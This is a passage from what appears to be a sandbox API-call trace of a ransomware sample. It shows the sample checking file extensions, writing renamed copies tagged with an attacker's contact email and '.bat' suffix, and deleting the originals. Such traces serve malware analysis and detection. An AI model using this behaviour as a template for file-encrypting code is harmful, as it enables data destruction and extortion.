lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x30, lpOverlapped=0x0) returned 1 [0046.687] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.687] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x110, lpOverlapped=0x0) returned 1 [0046.688] SetEndOfFile (hFile=0x2cc) returned 1 [0046.688] CloseHandle (hObject=0x2cc) returned 1 [0046.688] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.688] SetEndOfFile (hFile=0x2e4) returned 1 [0046.689] CloseHandle (hObject=0x2e4) returned 1 [0046.689] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0046.689] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 1 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.690] lstrlenW (lpString=".doc") returned 4 [0046.690] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0046.690] lstrlenW (lpString=".docx") returned 5 [0046.690] lstrcmpiW (lpString1=".docx", lpString2="t.log") returned -1 [0046.690] lstrlenW (lpString=".pdf") returned 4 [0046.690] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0046.690] lstrlenW (lpString=".xls") returned 4 [0046.690] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0046.690] lstrlenW (lpString=".xlsx") returned 5 [0046.690] lstrcmpiW (lpString1=".xlsx", lpString2="t.log") returned -1 [0046.690] lstrlenW (lpString=".ppt") returned 4 [0046.690] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.690] lstrlenW (lpString=".zip") returned 4 [0046.690] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0046.690] lstrlenW (lpString=".rar") returned 4 [0046.690] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0046.690] lstrlenW (lpString=".bz2") returned 4 [0046.690] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0046.690] lstrlenW (lpString=".7z") returned 3 [0046.690] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.690] lstrlenW (lpString=".dbf") returned 4 [0046.690] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.690] lstrlenW (lpString=".1cd") returned 4 [0046.690] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.690] lstrlenW (lpString=".jpg") returned 4 [0046.690] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.690] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.691] lstrlenW (lpString=".doc") returned 4 [0046.691] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0046.691] lstrlenW (lpString=".docx") returned 5 [0046.691] lstrcmpiW (lpString1=".docx", lpString2="t.log") returned -1 [0046.691] lstrlenW (lpString=".pdf") returned 4 [0046.691] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0046.691] lstrlenW (lpString=".xls") returned 4 [0046.691] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0046.691] lstrlenW (lpString=".xlsx") returned 5 [0046.691] lstrcmpiW (lpString1=".xlsx", lpString2="t.log") returned -1 [0046.691] lstrlenW (lpString=".ppt") returned 4 [0046.691] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0046.691] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.691] lstrlenW (lpString=".zip") returned 4 [0046.691] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0046.691] lstrlenW (lpString=".rar") returned 4 [0046.691] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0046.691] lstrlenW (lpString=".bz2") returned 4 [0046.691] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0046.691] lstrlenW (lpString=".7z") returned 3 [0046.691] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0046.691] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.691] lstrlenW (lpString=".dbf") returned 4 [0046.691] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0046.691] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.691] lstrlenW (lpString=".1cd") returned 4 [0046.691] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0046.691] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0046.691] lstrlenW (lpString=".jpg") returned 4 [0046.691] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0046.691] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.691] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.692] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.692] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=74214) returned 1 [0046.692] CloseHandle (hObject=0x2e4) returned 1 [0046.692] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 0x80 [0046.692] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.692] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.692] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.692] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.692] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0046.692] GetLastError () returned 0x0 [0046.692] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x121e6, lpOverlapped=0x0) returned 1 [0046.722] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x121f0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x121f0, lpOverlapped=0x0) returned 1 [0046.725] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.725] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf6, lpOverlapped=0x0) returned 1 [0046.725] SetEndOfFile (hFile=0x2cc) returned 1 [0046.725] CloseHandle (hObject=0x2cc) returned 1 [0046.726] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.727] SetEndOfFile (hFile=0x2e4) returned 1 [0046.728] CloseHandle (hObject=0x2e4) returned 1 [0046.728] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.728] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 1 [0046.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.728] lstrlenW (lpString=".doc") returned 4 [0046.728] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.728] lstrlenW (lpString=".docx") returned 5 [0046.728] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.728] lstrlenW (lpString=".pdf") returned 4 [0046.728] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.728] lstrlenW (lpString=".xls") returned 4 [0046.728] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.728] lstrlenW (lpString=".xlsx") returned 5 [0046.728] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.728] lstrlenW (lpString=".ppt") returned 4 [0046.728] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.729] lstrlenW (lpString=".zip") returned 4 [0046.729] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.729] lstrlenW (lpString=".rar") returned 4 [0046.729] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString=".bz2") returned 4 [0046.729] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString=".7z") returned 3 [0046.729] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.729] lstrlenW (lpString=".dbf") returned 4 [0046.729] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.729] lstrlenW (lpString=".1cd") returned 4 [0046.729] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.729] lstrlenW (lpString=".jpg") returned 4 [0046.729] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.729] lstrlenW (lpString=".doc") returned 4 [0046.729] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString=".docx") returned 5 [0046.729] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.729] lstrlenW (lpString=".pdf") returned 4 [0046.729] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.729] lstrlenW (lpString=".xls") returned 4 [0046.730] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.730] lstrlenW (lpString=".xlsx") returned 5 [0046.730] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.730] lstrlenW (lpString=".ppt") returned 4 [0046.730] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.730] lstrlenW (lpString=".zip") returned 4 [0046.730] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.730] lstrlenW (lpString=".rar") returned 4 [0046.730] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.730] lstrlenW (lpString=".bz2") returned 4 [0046.730] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.730] lstrlenW (lpString=".7z") returned 3 [0046.730] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.730] lstrlenW (lpString=".dbf") returned 4 [0046.730] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.730] lstrlenW (lpString=".1cd") returned 4 [0046.730] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0046.730] lstrlenW (lpString=".jpg") returned 4 [0046.730] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.730] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.730] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.730] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.739] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=80970) returned 1 [0046.739] CloseHandle (hObject=0x2e4) returned 1 [0046.739] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 0x80 [0046.739] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.739] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.739] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.739] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.739] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0046.739] GetLastError () returned 0x0 [0046.739] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x13c4a, lpOverlapped=0x0) returned 1 [0046.744] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13c50, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13c50, lpOverlapped=0x0) returned 1 [0046.746] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.746] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf6, lpOverlapped=0x0) returned 1 [0046.746] SetEndOfFile (hFile=0x2cc) returned 1 [0046.746] CloseHandle (hObject=0x2cc) returned 1 [0046.749] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.749] SetEndOfFile (hFile=0x2e4) returned 1 [0046.750] CloseHandle (hObject=0x2e4) returned 1 [0046.750] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.750] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 1 [0046.750] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.750] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.750] lstrlenW (lpString=".doc") returned 4 [0046.750] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString=".docx") returned 5 [0046.751] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.751] lstrlenW (lpString=".pdf") returned 4 [0046.751] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString=".xls") returned 4 [0046.751] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString=".xlsx") returned 5 [0046.751] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.751] lstrlenW (lpString=".ppt") returned 4 [0046.751] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.751] lstrlenW (lpString=".zip") returned 4 [0046.751] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.751] lstrlenW (lpString=".rar") returned 4 [0046.751] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString=".bz2") returned 4 [0046.751] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString=".7z") returned 3 [0046.751] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.751] lstrlenW (lpString=".dbf") returned 4 [0046.751] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.751] lstrlenW (lpString=".1cd") returned 4 [0046.751] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.751] lstrlenW (lpString=".jpg") returned 4 [0046.751] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.751] lstrlenW (lpString=".doc") returned 4 [0046.751] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.751] lstrlenW (lpString=".docx") returned 5 [0046.751] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.751] lstrlenW (lpString=".pdf") returned 4 [0046.751] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.752] lstrlenW (lpString=".xls") returned 4 [0046.752] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.752] lstrlenW (lpString=".xlsx") returned 5 [0046.752] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.752] lstrlenW (lpString=".ppt") returned 4 [0046.752] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.752] lstrlenW (lpString=".zip") returned 4 [0046.752] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.752] lstrlenW (lpString=".rar") returned 4 [0046.752] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.752] lstrlenW (lpString=".bz2") returned 4 [0046.752] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.752] lstrlenW (lpString=".7z") returned 3 [0046.752] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.752] lstrlenW (lpString=".dbf") returned 4 [0046.752] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.752] lstrlenW (lpString=".1cd") returned 4 [0046.752] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0046.752] lstrlenW (lpString=".jpg") returned 4 [0046.752] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.752] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.752] lstrlenW (lpString="eula.rtf") returned 8 [0046.752] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.752] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=3314) returned 1 [0046.753] CloseHandle (hObject=0x2e4) returned 1 [0046.753] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 0x80 [0046.753] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.753] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.753] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.753] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.753] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0046.753] GetLastError () returned 0x0 [0046.753] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xcf2, lpOverlapped=0x0) returned 1 [0046.756] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xd00, lpOverlapped=0x0) returned 1 [0046.757] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.757] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0046.757] SetEndOfFile (hFile=0x2cc) returned 1 [0046.758] CloseHandle (hObject=0x2cc) returned 1 [0046.758] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.758] SetEndOfFile (hFile=0x2e4) returned 1 [0046.759] CloseHandle (hObject=0x2e4) returned 1 [0046.759] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.759] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 1 [0046.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.759] lstrlenW (lpString=".doc") returned 4 [0046.759] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.759] lstrlenW (lpString=".docx") returned 5 [0046.759] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.760] lstrlenW (lpString=".pdf") returned 4 [0046.760] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.760] lstrlenW (lpString=".xls") returned 4 [0046.760] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.760] lstrlenW (lpString=".xlsx") returned 5 [0046.760] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.760] lstrlenW (lpString=".ppt") returned 4 [0046.760] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.760] lstrlenW 